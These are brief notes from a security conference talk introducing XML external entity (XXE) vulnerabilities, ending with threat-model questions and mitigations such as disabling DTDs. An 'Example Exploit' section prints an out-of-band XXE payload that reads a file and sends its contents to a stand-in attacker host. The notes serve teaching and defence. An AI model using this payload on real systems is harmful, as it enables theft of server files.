XML eXternal Entities

Notes from BSidesPDX talk by @brimy; giving a great introduction on how XXE vulnerabilities operate. Video posted

Added to the OWASP 10 in 2017


HTML “Entities” are the usual entrypoint. & -> & rendered, triggers.

XML has User-Defined Entities <!eNTITY xml “Extensible Markup Language”> %xml;

External Entities

<!ENTITY chapter1 SYSTEM "chapter1.txt">

Tag rendering executes call to find the contents of chapter1.txt and render it.

Enables users to execute XML at the rendering phase, and access and return sensitive data.

Example Exploit

evil.com/evil.dtd http://evil.com/evil.htm?payload=&file;

<!ENTITY % all
    "<!ENTITY send SYSTEM 'http://evil.com/evil.html?payload=%file;'>"

Threat Model Questions to Ask

Does your server allow DTD? .Net is one of the primary vulnerabilities; .NET < 4.5.2 is vulnerable to default hacks.

  • Do you allow external entities?(You shouldn’t)
  • Do you validate un-trusted input?(You always should)

DO: Update Parsers, Disable DTD & XXE, validate input, if necessary set policies for resolving URLs.